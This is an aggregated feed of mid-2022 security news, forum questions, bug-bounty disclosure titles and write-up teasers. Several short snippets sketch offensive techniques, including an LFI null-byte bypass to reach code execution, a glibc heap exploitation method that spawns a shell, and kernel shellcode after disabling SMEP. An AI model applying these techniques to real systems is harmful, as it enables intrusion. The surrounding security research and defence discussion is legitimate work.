    I made a huge security blunder over the last couple weeks... I was running an client-sided HTML server that I could access on my localhost (127.0.0.1:5500/index.html) while developing javascript program using VS code. I was using the VS code live server extension from here https://github.com/ritwickdey/vscode-live-server which exposes port 5500 on my localhost by default. I was doing this while using public wifi for many weeks! I didn't even realize that someone could nmap the LAN and find that my port 5500 was open and they could simply go to my live server directly with their browser. My webapp has a simple X/Y axis chart where I plot some API websocket data. No user input afaik. I used the latest chrome to run the server and always keep my system updated. No SElinux though. Edited my main question: I'm just assuming worst case scenario. If the attacker got to my live server, what kind of attacks can they perform on it? Because javascript is client sided/browser based, can they extract any info out of my native system? Edit2: From my cursory research on this topic, the main forms of attack from an attacker client is social engineering. For example inserting malicious payload to a link and having me click on it to extract information from me. Other than that, exploiting any flaws inside the actual JavaScript itself, it would be like hacking themselves. The app I was testing was only front end, 100% browser based. No backend server involved at all. u/nuclear_splines comment helped me understand it better. If I'm wrong feel free to correct me here. submitted by /u/Fuzzht1 [link] [comments]
    How does an attacker know they have gained access to an internal network?
    I've always wanted to know, how does an attacker (launching at attack from the Internet) know when they have breached a network's defenses and gained access to a private / internal network? Would it be as simple as having a GUI or remote desktop configuration and seeing the desktop or GUI of some device on the internal network? Or would an attacker conduct a network / port scan to verify that they're seeing all private IP addresses and use that as evidence that they're on the inside? submitted by /u/Anontrovert [link] [comments]
    Vulnerability Alerting using software inventory
    I'm looking for services that aggregate vendor security alerts, notifications, advisories, etc. Preferably matching alerts with software inventories using a CMDB. If in any way possible (manual) government feeds would be great as well. Anyone familiar with services like these, focused on enterprises? submitted by /u/overworst [link] [comments]
    Has anyone here created an ISAC?
    Has anyone here created an ISAC for their industry / geographical region or whatever? Any tips for someone looking to start one? What model did you use? Did you charge a fee? How did you get people involved? submitted by /u/UnderstandingInfosec [link] [comments]
    Briefly connected to hotel wifi to download a game from Steam and a discord call, should I be worried?
    So I'm currently on vacation and have some down time at our hotel so I decided to try and play some games. I do not have a VPN (I know it's recommended in general but I never wanted to pay for a service and I am a little paranoid of the free ones). I actively wanted to avoid the hotel wifi so I downloaded some games onto my laptop at home on Steam but didn't do the first time startup which would not work without the internet. So I finished doing that and also decided to download another game and then disconnect from the wifi. Again later I was on my phone on a discord call with some friends and thought maybe I should try the wifi to see if the connection is better as I was thinking to myself that I was over paranoid. Well here I am now starting to stress out about it, am I at any risk of important information being stolen? As I said all I did was connect to wifi on my phone for around a minute while on a discord call, and then download stuff from Steam over an hour or so. The hotel wifi is password protected but I do not believe it has wpa2 (not very familiar with network stuff) or anything like that. submitted by /u/mrahma [link] [comments]
    Very long uninstall
    I recently installed an app on my Windows 10 machine that is very graphics intensive. I took a look at it and decided to uninstall. The installer reported an estimated 30 minutes to uninstall the software which made me suspect it was doing something more than uninstalling. I contacted the developer who was very responsive and told me that this was normal. I went ahead with the uninstall which ended up taking over 20 minutes but I also fired up Wireshark and captured a PCAP file during the process. I'm a complete n00b at this point and was wondering if someone might be willing to look at the file for anything nefarious. I'm also curious if there is a legitimate reason that the uninstall should take that long. submitted by /u/Danno_ST [link] [comments]
    How does an IP address get spoofed?
    Is it possible to mask an ip address with another. If so, how? submitted by /u/iExtrapolate314 [link] [comments]
  • Open

    Optimizing CI/CD Credential Hygiene – A Comparison of CI/CD Solutions
    submitted by /u/TupleType1 [link] [comments]
  • Open

    Continuous testing, continuous security
    A talk with our Red Team lead, Gabriel Franco Continue reading on Faraday »
    HACKER DOUBLE SUMMER 2022 GUIDES —Part Two: Capture The Flags
    Welcome to the DCG 201 guide to Hacker Double Summer! This is part of a series where we are going to cover all the various hacker… Continue reading on Medium »
  • Open

    【内含福利】倒计时1天!CIS大会夏日版即将启航
    7月8日上午9点,我们在CIS大会夏日版官网见!
    FreeBuf早报 | NPM供应链攻击影响数百个网站;英国军队社交媒体账户被劫持
    英国军队社交媒体账户被劫持。
    洞见:数据治理与数据安全治理思考
    数据治理是组织中涉及数据使用的一整套管理行为,包括数据治理计划、监控、实施。
    入侵数百个网站和程序,NPM供应链攻击造成的影响不可估量
    近期,NPM供应链攻击破坏了数百个应用和网站。
    新勒索软件RedAlert来袭!已有Windows、Linux等服务器中招
    一种名为RedAlert的新勒索软件对企业网络进行攻击,目前已经有Windows和Linux VMWare ESXi系统中招。
    实战基于KMDF的磁盘写保护
    本文简单讲下基于KMDF的磁盘写保护功能如何实现。
  • Open

    I took the SANS GCFE exam and this wall of text is what happened next
    Who/What/Where/When: 2 weeks yore, I passed the GCFE exam with a score of 91%. I'm a Security Engineer with a (now) 8-pack of certs. This was my 2nd SANS cert after GCIH. I took the exam remotely proctored and found the experience to be much smoother than my experience in the year of 2020 yore. How / 9 Observations: The course handouts were my dear friends during my 3-hours of need. Give them a thorough review before the test and bring those you might find useful with you to the exam. I made a target timetable (tinyurl.com/yckv9jy8) which helped me to keep track of my exam pacing. Had I not had this, I would have inevitably wasted precious neuron cycles calculating my remaining time. This helped to keep me focused and strategize when to spend extra time on questions. I took a more b…
  • Open

    Undetected from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Undetected from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Undetected from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    .NET 反序列化漏洞之绕过 SerializationBinder 不安全的类型绑定
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/F2jFMkmN3K9yn_uuICStuA 概述 很多 .NET 应用程序在修复 BinaryFormatter 、 SoapFormatter 、LosFormatter 、 NetDataContractSerializer 、ObjectStateFormatter 等反序列化漏洞时,喜欢通过自定义 Se...
  • Open

    .NET 反序列化漏洞之绕过 SerializationBinder 不安全的类型绑定
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/F2jFMkmN3K9yn_uuICStuA 概述 很多 .NET 应用程序在修复 BinaryFormatter 、 SoapFormatter 、LosFormatter 、 NetDataContractSerializer 、ObjectStateFormatter 等反序列化漏洞时,喜欢通过自定义 Se...
  • Open

    Abusing functionality to exploit a super SSRF in Jira Server (CVE-2022-26135)
    Article URL: https://blog.assetnote.io/2022/06/26/exploiting-ssrf-in-jira/ Comments URL: https://news.ycombinator.com/item?id=31995638 Points: 1 # Comments: 0

  • Open

    Microscopes and Optics in General
    submitted by /u/mrcanard [link] [comments]
    pictures of landmines.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    photos of illegally dumped rubbish in Bayview, California.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    All fortnite models with the .blend extension (google drive)
    Chapter 1 models: https://drive.google.com/drive/folders/13XwAQX770Rkb5Qx-XFKYjlyn130OOGjj Chapter 2 models: https://drive.google.com/drive/folders/1L2wa9TMRwdbRjK_FgnX-u2KvBPxDxR_z ​ (credits are in the 'please read' doc) submitted by /u/ethansean0607 [link] [comments]
    Indiana Military history
    http://indianamilitary.org/ATTERBURYAAF/ http://indianamilitary.org/Bakalar%20AFB/ http://indianamilitary.org/Camp%20Atterbury/ http://indianamilitary.org/FtHarrison/ http://indianamilitary.org/WakemanHospital/ http://indianamilitary.org/28TH/ http://indianamilitary.org/30TH/ http://indianamilitary.org/31STINFDIV/ http://indianamilitary.org/83RD/ http://indianamilitary.org/92nd/ http://indianamilitary.org/106ID/ http://indianamilitary.org/CA%20POWs/ http://indianamilitary.org/German%20PW%20Camps/ http://indianamilitary.org/CoD151Ranger/ http://indianamilitary.org/Misc/ http://indianamilitary.org/YANK/ http://indianamilitary.org/StarsStripes/ http://indianamilitary.org/ROSTERs/ ​ Some army manuals, unit history books, and Army published newspapers and magazines. Mostly WW2 material from what I could tell. submitted by /u/c-rn [link] [comments]
  • Open

    Abusing functionality to exploit a super SSRF in Jira Server (CVE-2022-26135)
    submitted by /u/Mempodipper [link] [comments]
    From NtObjectManager to PetitPotam
    submitted by /u/onlinereadme [link] [comments]
  • Open

    Re-architecture of lab environment: workstations vs. server?
    Hey guys, currently I'm tasked to create a draft for our new forensics lab. We use one workstation per case/analyst in our current setup (5 in total). All of them have a fairly big RAID. Our current workloads are mainly analysing triage packages, full images and logs. Once half a year we get a small eDiscovery from our internal compliance department with ~10 GB/case. All of them are from ~2016 with 20 physical cores, 128 GB RAM and two RAIDs for evidence files and case files. Both of them are ~12 TB net. I want to build a "modern lab environment". Goals I try to achieve after the re-architecture: * Hassle-free usage of evidence/images for multiple analysts * A good working environment with less noise pollution * Maintain high performance for CPU-intensive tasks (e. g. Nuix Workstation…
    Recover Bitlocker Drive that has been formatted
    Is it possible to recover data from a "bitlocked" drive that has been formatted with a new windows install? In my mind, even if you could recover the data from the slackspace it would all be garbage unless you run the decryption function on it which I don't think is possible unless you're able to reconstruct enough of the drive to be able to decrypt it with the recovery key. submitted by /u/Tight_Candidate_2293 [link] [comments]
    Google Photo Cache?
    Hello everyone! With Magnet Axiom I find an image inside "com.google.android.apps.photos\cache\glide_cache" at 23:50. What does this mean? That the image was displayed at that time, or was it generated by the system? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    Bellatrix( VulHub)
    Hello and welcome. I wanted to get a writeup out there on my favorite series and talk of the year , “Harry Potter and the Road to OSCP” ok… Continue reading on Medium »
  • Open

    How easy is it to create a burner laptop?
    I'm a joe schmoe with little info sec knowledge. How feasible would it be for me to purchase a cheap laptop/chromebook and set it up in a way that my web surfing habits wouldn't be able to be tracked back to me specifically? My personal/work machines are both plugged in to all of my personal accounts already. Would it be enough to just buy a laptop and keep my personal accounts off of it, or would i have to set up a VPN for it/jump through any other hoops? I don't work in a field with sensitive data or anything like that, so it wouldn't have to be locked up airtight. I'm mostly just interested in shrinking my digital footprint and protecting my privacy. Apologies if I'm in the wrong place - just steer me in the right direction if that's the case. Thanks - submitted by /u/Lt_AldoRaine_ [link] [comments]
    Hardening [unsecure] 2-layer Architecture Applications
    Hello /r/AskNetsec Working in Application Security within a legacy-software abundant landscape company, sometimes we come across situations where we are tasked with proposing security requirements and architectural security improvements to applications that are, by-default, unsecure due to their 2-layer architecture. Example: A thick-client application running on users' workstations or VDI that communicates directly with the database instead of having a back-end logic server behind. In these cases, we find it hard to propose meaningful security improvements because the design is flawed by default - however business requirements often don't allow us to demand a full architecture refactor or replacing the solution. For these cases, which would be other areas of improvement that you'd propose in terms of security requirements, architectural tweaks, etc. - so we can have something to show for and improve the security as much as we can given the constraint in place. Thanks! submitted by /u/FabioFreitas [link] [comments]
  • Open

    SSRF via Office file thumbnails
    Slack disclosed a bug submitted by ziot: https://hackerone.com/reports/671935 - Bounty: $4000
    Exposure of a valid Gitlab-Workhorse JWT leading to various bad things
    GitLab disclosed a bug submitted by ledz1996: https://hackerone.com/reports/1040786 - Bounty: $10000
    Reflected Cross site Scripting (XSS) on https://one.newrelic.com
    New Relic disclosed a bug submitted by sairanga: https://hackerone.com/reports/1367642 - Bounty: $2048
    Reflected XSS on https://wwwapps.ups.com/ctc/request?loc=
    UPS VDP disclosed a bug submitted by 3amoura: https://hackerone.com/reports/1536461
  • Open

    War in Ukraine / July 4
    Russia continues its offensive in Donbas Continue reading on Medium »
    How to use Creepy Tool for Beginner
    All we have to do is choose the platform-appropriate version and install it. After installing Creepy, the next step is to configure the… Continue reading on Medium »
    Thoughts from an OSINT Newbie…
    For the past few weeks, I have been interested in changing careers to work as an OSINT Investigator. Continue reading on Medium »
    Brand Intelligence: How to use OSINT in an organization
    Hello cybersecurity folks, I know you are skilled at defending your network and other infrastructures from cyber attacks. Yeah, I know you… Continue reading on Medium »
    Top 7 Free Open Source Intelligence Hacking Tools For Beginners
    Open Source Intelligence (OSINT) Continue reading on Medium »
    Coletando informações de discentes, docentes, servidores e tercerizados da UFRN
    Olá Pessoal, faz muito de tempo que não escrevo um artigo relativo a segurança da informação no medium (Estava esperando algo legal… Continue reading on Medium »
  • Open

    How To Use Foundry To PoC Bug Leads, Part 1
    You’ve probably heard about all of the epic disclosures in the Web3 bug bounty space recently and decided that maybe it’s time to pave… Continue reading on Immunefi »
    Get Rich by Finding Bugs
    These websites will pay you for it Continue reading on Level Up Coding »
    rDEX V2 is Deployed on StaFiHub Testnet with The Bug Bounty Program.
    Continue reading on Medium »
    How I find open redirect in Facebook
    Hi Guys Continue reading on Medium »
    rDEX V2 is Deployed on the StaFiHub Testnet with The Bug Bounty Program
    Overview Continue reading on StaFi »
    How To Get Start Into Bug Bounty By Kidnapshadow
    Hello everyone, After a lot of requests and questions on topics related to Bug Bounty like how to start, how to beat duplicates, what to… Continue reading on Medium »
    XSScope-GUI Framework for XSS Clientside attacks
    The most cutting-edge GUI Framework for XSS Client-side attacks is called XSScope. It is capable of real-time HTML injections and various… Continue reading on Medium »
    LFI TO RCE(PHP WRAPPERS)
    in the following target, we see that the application will always put a .php now we will have to circumvent this using a code %00(nullbyte) Continue reading on Medium »
  • Open

    SecWiki News 2022-07-05 Review
    图结构的相似度度量与分类 by ourren SecWiki周刊(第435期) by ourren 境外非政府组织在华活动分析报告(2017-2021) by ourren 从2023财年预算看美国网络发展动向 by ourren 网空测绘--就是另一形态的Google by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-05 Review
    图结构的相似度度量与分类 by ourren SecWiki周刊(第435期) by ourren 境外非政府组织在华活动分析报告(2017-2021) by ourren 从2023财年预算看美国网络发展动向 by ourren 网空测绘--就是另一形态的Google by ourren 更多最新文章,请访问SecWiki
  • Open

    A Diamond in the Ruff
    This blog post was co-authored with Charlie Clark at Semperis 1.1      Background of the ‘Diamond’ Attack One day, while browsing YouTube, we came across an older presentation from Blackhat 2015 by Tal Be’ery and Michael Cherny. In their talk, and subsequent brief, WATCHING THE WATCHDOG: PROTECTING KERBEROS AUTHENTICATION WITH NETWORK MONITORING, they outlined something we... The post A Diamond in the Ruff appeared first on TrustedSec.
  • Open

    When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors
    Penetration testing and adversary emulation tool Brute Ratel C4 is effective at defeating modern detection capabilities – and malicious actors have begun to adopt it. The post When Pentest Tools Go Brutal: Red-Teaming Tool Being Abused by Malicious Actors appeared first on Unit 42.
  • Open

    Linear-Time Temporal Logic Guided Greybox Fuzzing
    Article URL: https://github.com/ltlfuzzer/LTL-Fuzzer Comments URL: https://news.ycombinator.com/item?id=31987389 Points: 1 # Comments: 0
  • Open

    Free webinar on threat hunting with Sigma rules
    submitted by /u/alertnoalert [link] [comments]
  • Open

    FreeBuf早报 | 北约将发展快速网络响应能力;PCI DSS 4.0发布以应对新兴威胁和技术
    全球动态1.IDC:2021年中国云工作负载安全市场规模达2.8亿美元IDC于2022年7月正式发布了针对中国云工作负载安全产品的市场份额研究报告,即:《中国云工作负载安全市场份额,2021:云原生与安全左移驱动技术持续创新》,中国市场在2021年实现了规模和增速的双爆发,市场规模达到2.8亿美元,相较2020年同比增长57.9%。 [阅读原文]2.万维网联盟拒绝谷歌和Mozilla对分散标识符(
    网络攻防演练心态调整 | FreeBuf甲方社群直播回顾
    网络攻防演练前期的准备工作,除了要做好资产梳理、管控安全接入、安全纵深防护,还要调整好心态,以积极的心态面对攻防演练。
    Chrome被爆严重零日漏洞,谷歌督促用户尽快更新
    谷歌发布公告,称已经为Windows用户发布了Chrome 103.0.5060.114更新。
    CISA命令美国联邦机构在7月22日前为CVE-2022-26925打补丁
    美国网络安全和基础设施安全局再次将CVE-2022-26925漏洞添加到已知漏洞目录中,并命令联邦文职行政部门在7月22日前执行修复。
    英国签署协议,与美国边防警卫共享生物识别数据库
    美方基于国际生物特征信息共享计划(IBIS),并在增强边境安全伙伴关系 (EBSP) 的支持下,要求引入新的签证要求。
    【直播预约】双直播间首次启用 | CIS大会夏日版5天后见
    「CIS大会夏日版·Summer Live」即将精彩来袭!
  • Open

    New Repeater features to help you test more efficiently
    If you use Burp Suite Professional or Burp Suite Community Edition for manual security testing, then you'll be familiar with tools like Burp Repeater and Burp Intruder. They make life as a tester much
  • Open

    New Repeater features to help you test more efficiently
    If you use Burp Suite Professional or Burp Suite Community Edition for manual security testing, then you'll be familiar with tools like Burp Repeater and Burp Intruder. They make life as a tester much
  • Open

    Yazamadıklarımı Marmara’ya Saldım ya da İznik’teki Ayakkabı Bağı
    Bu kadar saçma bir başlığa rağmen burayı okumaya başladıysan kendinle zorun var demektir. Continue reading on Medium »

  • Open

    Is there any way that payments can be handled in a secure way on an HTTP webpage?
    [SOLVED] I am supposed to pay for a transcript and the website wants me to enter payment in an http page with an embedded payment platform. The payment platform appears to use asp, but the webpage it is embedded in is plain html. If I click on the box for the credit card, firefox pops up a message saying that it is not an encrypted webpage and warns me about security. Obviously this sets off multiple red flags telling me that I shouldn't trust that website, but it is an official website (albeit hosted in Korea where apparently security is lax). Is there any chance that this was implemented in a secure way? How could I test it? ​ EDIT: Per the recommendation, I ran a transaction with a bogus number to try and capture the behaviour in wireshark; what I found was that initiating the transaction creates a connection on port 443 and the data seems to be sent there, so I guess it's secure? But I still don't quite trust it so I'll probably be mailing stuff. PS: I cannot share a link because my supervisor works with the people who run the site and they wouldn't want me to send a link. I'm not sure the page is even listed so they might be going for a security through obscurity thing. submitted by /u/LubbyLardo [link] [comments]
  • Open

    Crack the hash Level 2 Write-up (Free Room on TryHackMe) Cracking Salted Hashes
    Introduction Continue reading on Medium »
    What is Burp Suite
    Put simply: Burp Suite is a framework written in Java that aims to provide a one-stop-shop for web application penetration testing. Continue reading on Medium »
    Blackbird OSINT tool
    An OSINT tool to search fast for accounts by username across 131 sites. Continue reading on Medium »
    MSA Weekly 2 — Cara Menginstalasi Virtual Machine dan Web Server Nginx
    Dengan adanya perkembangan jaman anda bisa menggunakan berbagai macam OS dalam 1 komputer saja. Dengan seperti itu anda dapat menciptakan… Continue reading on Medium »
    MSA Weekly 2 — “Tutorial Instalasi Nginx Pada Kali Linux”
    Hai hai, pada kesempatan kali ini kita akan mencoba belajar untuk instalasi Nginx pada Kali linux. Nah bagi kalian yang belum pernah… Continue reading on Medium »
    HackTools-The complete Red Team add-on for Web Pentester
    HackTools is a web addon that makes it easier to perform online application penetration testing. It comes with cheat sheets and all the… Continue reading on Medium »
    Continuous Security Project [TR]
    Herkese merhaba, bu yazımda Continuos Security için geliştiriğimiz projeden bahsediyor olacağım. Continue reading on Medium »
    XSS Explained
    Cross-site scripting, also known as XSS is a security vulnerability typically found in web applications. Continue reading on Medium »
    My first ever Bug Bounty reward!
    Hello guys! Vishnu here. I am back again with yet another interesting article. Well technically, this is not the first bug I discovered,... Continue reading on Medium »
  • Open

    From Misconfigured Certificate Template to Windows Domain Admin
    submitted by /u/Kondencuotaspienas [link] [comments]
  • Open

    Blackbird OSINT tool
    An OSINT tool to search fast for accounts by username across 131 sites. Continue reading on Medium »
    War in Ukraine / July 1–3
    👉 Days of Eu Integration in Ukraine’s Parliament Continue reading on Medium »
  • Open

    SecWiki News 2022-07-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    맥북을 Self-hosted Github action runner로 만들기
    오늘은 Github action의 runner에 대한 이야기를 하려고 합니다. 글을 쓰기 앞서 잠깐 이야기를 풀자면 제 자동화 환경의 대다수는 Github action으로 동작합니다. Golang과 Ruby로 만들어진 Application 들과 Zest script 들이죠. 다만 Github action의 경우 github의 runner에서 동작하기 때문에 내 서버가 아닌 Github의 서버, 즉 해외에서 동작하게 됩니다. 물론 크게 상관은 없겠지만, 때때로 국내 환경들은 해외 접근에 대해 차단하는 경우가 있어서 정상적으로 동작하지 않습니다. 그래서 지난달에 Self-hosted runner를 세팅했었고 내용을 공유해봅니다. Self-hosted Runner란? Self-hosted runner는 Github action이 사용자가 지정한 PC 또는 서버에서 동작할 수 있도록 제공되는 기능입니다. 마치 집에 있는 피씨가 Agent가 되는거죠. 그리고 Self-hosted runner는 Agent가 Listen 하는 형태가 아니라 Agent가 Github 서버쪽으로 접근하는 형태입니다. 그래서 개인 환경을 공인 IP로 노출할 필요가 없는건 정말 좋습니다 :D Installation actions-runner 설치는 간단합니다. runner 압축 파일을 다운로드 및 압축해제 후 run.sh를 실행하면 runner가 동작합니다. mkdir actions-runner && cd actions-runner curl -o actions-runner-osx-x64-2.293.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.293.0/actions-runner-osx-x64-2.293.0.tar.gz tar xzf ./actions-runner-osx-x64-2.293.0.tar.gz cd actions-runner ./run.sh run.sh 실행 시 interactive-shell로 몇가지 설정을 진행합니다. 모두 완료하면 Github repo(Repo > Settings > Actions > Runners)에서 해당 runner를 확인할 수 있습니다. 그리고 등록한 runner는 workflow 파일 작성 시 아래와 같이 runs-on 을 통해 명시하여 사용할 수 있습니다. SecretSecret: runs-on: macOS needs: [Events] steps: - uses: actions/checkout@v2 - name: Run Zest # .... Make...
  • Open

    CVE-2022–32511 | Exploit | Remote Code Execution
    No content preview
  • Open

    CVE-2022–32511 | Exploit | Remote Code Execution
    No content preview
  • Open

    CVE-2022–32511 | Exploit | Remote Code Execution
    No content preview
  • Open

    SMTP Command Injection in iCalendar Attachments to Emails via Newlines
    Nextcloud disclosed a bug submitted by spaceraccoon: https://hackerone.com/reports/1516377 - Bounty: $250
    Moderators can send messages to users from banned subreddits via `oauth.reddit.com/api/mod/conversations`
    Reddit disclosed a bug submitted by zqyzoid: https://hackerone.com/reports/1543770 - Bounty: $100
  • Open

    Is it feasible to image a 12tb storage server? What is the best storage solution for the image? Which imaging software? (Solaris os)
    Live imaging. Should i do a dd? submitted by /u/MasterBet [link] [comments]
  • Open

    Vulnerability Capstone | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/vulnerabilitycapstone Continue reading on Medium »
    TryHackMe | Red Team Fundamentals
    Learn about the basics of a red engagement, the main components and stakeholders involved. Continue reading on Medium »
    eJPT in My Point of View
    I am writing a post after about a year since I have been busy with studies and work. Nowadays a lot is going on in our country and people… Continue reading on Medium »
  • Open

    FreeBuf早报 | 欧盟举办超大规模网络安全演习;恶意软件破坏了多个美国州失业网站
    根据 Compia 公司最新发布的科技趋势报告, 网络安全在 2022 年十大高薪紧缺技能中排名第一。
    【直播享好礼】虚拟主播FreeBee首次亮相CIS大会夏日版
    「CIS大会·夏日版 Summer Live」精彩来袭!超多活动,超多福利,就等你来!
    HackerOne员工出售漏洞报告牟利
    据HackerOne表示,这名员工联系了7名HackerOne 客户,并在少数披露中获取了赏金。
    TikTok向美国立法者保证,努力保护用户数据不受中国员工的影响
    TikTok 正在试图安抚美国立法者,并表示正在采取措施 ,加强数据安全保护。
    认证账户被黑,威胁行为者借名人推特发送钓鱼信息
    近期,威胁行为者正入侵Twitter认证帐户。
    一文看懂网络安全五年之巨变
    对于网络安全来说,五年的时间,已经让整个行业发生了翻天覆地的变化;而下一个黄金发展的五年,正在缓缓拉开序幕。
    Jenkins安全团队披露了29个受0Day漏洞影响的插件
    Jenkins安全团队披露了影响Jenkins自动化服务器中29个插件的数十项缺陷,其中大部分尚未得到修复
    微软已在数百个网络中发现 Raspberry Robin 蠕虫
    微软最近在来自各个行业的数百家组织的网络中发现了蠕虫病毒——Raspberry Robin(树莓知更鸟)。
    FreeBuf早报 | TikTok中国员工能访问部分不敏感美国用户数据;HackerOne员工“监守自盗”
    TikTok CEO 周受资表示,非美国员工,包括中国员工,将能够访问一小部分不敏感的 TikTok 美国用户数据。
  • Open

    NAPALM FTP Indexer
    submitted by /u/thiskeepsmeupatnight [link] [comments]

  • Open

    Kubeclarity – SBOM and Vulnerability Detection
    Article URL: https://sectool.co/blog/kubeclarity-sbom-vulnerability-detection Comments URL: https://news.ycombinator.com/item?id=31970937 Points: 2 # Comments: 0
    A HackerOne Employee Stole Vulnerability Reports from Security Researchers
    Article URL: https://www.pcmag.com/news/a-hackerone-employee-stole-vulnerability-reports-from-security-researchers Comments URL: https://news.ycombinator.com/item?id=31970622 Points: 9 # Comments: 1
  • Open

    Geolocation #3— Finding Shoigu
    On 26th June 2022, several videos appeared on Twitter showing Sergei Shoigu, the Minister of Defence of the Russian Federation, reportedly… Continue reading on Medium »
    Good News Roundup: the OSINT-inspired Geek Edition
    In good news, OSINT explains Ukraine’s latest victories, Africa uses AI to track locusts, and BirdNet successfully IDs birds by their songs Continue reading on Medium »
    Pantellica’s Inaugural OSINT Championship
    We’re excited to announce the launch of our inaugural OSINT Championship. This initiative is yet another unique pioneering effort by… Continue reading on Medium »
    SPY NEWS: 2022 — Week 26
    Summary of the espionage-related news stories for the Week 26 (June 26-July 2) of 2022. Continue reading on Medium »
  • Open

    nday exploit: netgear orbi unauthenticated command injection (CVE-2020-27861)
    submitted by /u/0xdea [link] [comments]
    Bypassing Firefox's HTML Sanitizer API
    submitted by /u/digicat [link] [comments]
    Code replay attack on the myGovID Scheme
    submitted by /u/Gallus [link] [comments]
  • Open

    House of Gods
    Worked on a new heap technique for older versions of glibc. House of Gods hijacks the thread_arena within 8 allocs and drops a shell after 10. Works for glibc < 2.27 and was tested against 2.23, 2.24, 2.25 and 2.26 Currently trying to adapt this technique (or parts of it atleast) to recent versions of glibc. But I have yet to find a way. If you have further ideas/improvements, let me know :) https://github.com/Milo-D/house-of-gods/blob/master/HOUSE_OF_GODS.TXT Same repo contains a small PoC. submitted by /u/__milo21 [link] [comments]
    Need help restoring execution after stack overflow in windows kernel
    I'm currently trying to exploit an driver. I was able to perform a stack overflow and execute my shellcode after disabling SMEP but it's causing a BSOD just after the executing the shellcode due to the registers and stack being corrupted. I read many articles trying to understand how to restore execution after executing the shellcode but couldn't find any success. I would really appreciate if someone can help me guide through this one. If you can help me please shoot a pm. Thanks submitted by /u/DudewithCoolusername [link] [comments]
  • Open

    SecWiki News 2022-07-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    A swag for a Open Redirect — Google Dork — Bug Bounty
    Hello Folks 👋,I have found a good open redirect with my param scanner. I will tell you here how I found it and what kind of swag I got… Continue reading on InfoSec Write-ups »
    DNS in Active Directory
    No content preview
  • Open

    A swag for a Open Redirect — Google Dork — Bug Bounty
    Hello Folks 👋,I have found a good open redirect with my param scanner. I will tell you here how I found it and what kind of swag I got… Continue reading on InfoSec Write-ups »
    DNS in Active Directory
    No content preview
  • Open

    A swag for a Open Redirect — Google Dork — Bug Bounty
    Hello Folks 👋,I have found a good open redirect with my param scanner. I will tell you here how I found it and what kind of swag I got… Continue reading on InfoSec Write-ups »
    DNS in Active Directory
    No content preview
  • Open

    How to become a red team operator
    What is a Red Team? Continue reading on Medium »
  • Open

    What do you think is lacking in the industry nowadays?
    This may be too vague of a topic, but for those who have been in the field a while, what do you wish existed that would make your job easier/better? What do you wish you had when you were first starting out? Whether it be research, training, resources, what are some things that would benefit the DFIR world for veterans and newcomers alike? submitted by /u/Corrsta [link] [comments]

  • Open

    Purple Team | Importance and Strategical Execution of Defense
    Purple Team is a group of cybersecurity experts who play the roles of the Blue and Red Teams in a cybersecurity exercise in order to… Continue reading on Medium »
  • Open

    A roadmap for a beginner exploit dev/security research
    Hello everyone, so im just trying to find an ideal roadmap Ive been playing ctfs and solving pwn challenges and stuff so now i want to move away from the basics and get into some real targets ​ so what do you guys think i should focus on something like routers and cheap IoT devices and try to find vulns in those and try to somehow get internships / jobs based on that or should i try to focus on something like browser exploitation (which I'm interested in ) and get more knowledge browsers and stuff and try to find bugs in them (which might take a long time and find low impact bugs as compared to something like routers /IoT devices which might be more difficult ). submitted by /u/MrXy0nixOG [link] [comments]
  • Open

    SecWiki News 2022-07-02 Review
    afrog 是一款性能卓越、快速稳定、PoC 可定制化的漏洞扫描工具 by 胖胖的ALEX BlueHound-一款自研主机威胁狩猎工具 by ourren 记一次Jira的搭建和相关利用 by ourren 浅谈Shiro CVE-2022-32532 by ourren JARM指纹随机化技术实现 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-02 Review
    afrog 是一款性能卓越、快速稳定、PoC 可定制化的漏洞扫描工具 by 胖胖的ALEX BlueHound-一款自研主机威胁狩猎工具 by ourren 记一次Jira的搭建和相关利用 by ourren 浅谈Shiro CVE-2022-32532 by ourren JARM指纹随机化技术实现 by ourren 更多最新文章,请访问SecWiki
  • Open

    Insufficiently protected credentials vulnerability in fixed in curl 7.83.0
    Article URL: https://packetstormsecurity.com/files/cve/CVE-2022-27776 Comments URL: https://news.ycombinator.com/item?id=31959958 Points: 1 # Comments: 0
  • Open

    Insecure File Upload
